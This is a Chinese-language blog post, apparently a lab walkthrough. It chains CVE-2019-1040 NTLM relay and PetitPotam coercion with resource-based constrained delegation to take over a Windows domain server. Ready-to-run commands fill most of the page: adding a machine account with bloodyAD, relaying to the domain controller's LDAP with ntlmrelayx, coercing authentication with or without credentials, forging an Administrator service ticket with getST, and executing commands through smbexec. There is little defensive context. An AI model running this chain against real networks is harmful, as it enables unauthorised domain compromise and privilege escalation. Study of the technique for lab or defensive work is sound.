CVE-2019-1040+基于资源约束委派利用

PetitPotam

利用区别:

  • 小于2016环境:在16的环境以下,默认在网络安全:可匿名访问的命名管道中有三个netlogon、samr、lsarpc。可匿名触发的
  • 2016以上环境需要域用户凭据

环境

hacker.com

域控(Windows server 2016):192.168.179.136

域内服务器(Windows server 2012):192.168.179.138

攻击机:192.168.179.132

过程

流程:

  • 添加一个机器账户
  • 利用PetitPotam强制触发Ntlm认证,192.168.179.138访问攻击机,中继到域控给刚添加的机器账户设置RBCD
  • 申请票据,拿下192.168.179.138

添加机器账户

1
python3 bloodyAD.py -d hacker.com -u test -p 'admin!@#45' --host 192.168.179.136 addComputer pddda '123456'

Xr5pYF.png

监听

1
python3 ntlmrelayx.py -t ldap://192.168.179.136 -smb2support --remove-mic --delegate-access --escalate-user pddda\$ 

Xr5il9.png

强制认证

2008、2012

1
python3 PetitPotam.py -d '' -u '' -p '' 192.168.179.132 192.168.179.138

需要一个域用户凭据

1
python3 PetitPotam.py -u adder -p 'admin!@#45' -d hacker.com 192.168.179.132 192.168.179.138

Xr59W4.png

成功设置委派

Xr5PSJ.png

申请票据

1
python3 getST.py hacker.com/pddda\$:123456 -spn CIFS/WEB.hacker.com -impersonate Administrator -dc-ip 192.168.179.136

Xr5SFU.png

执行命令

1
2
set KRB5CCNAME=administrator.ccache
python3 smbexec.py -target-ip 192.168.179.138 -k WEB.hacker.com -no-pass

Xr4xoT.png


本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!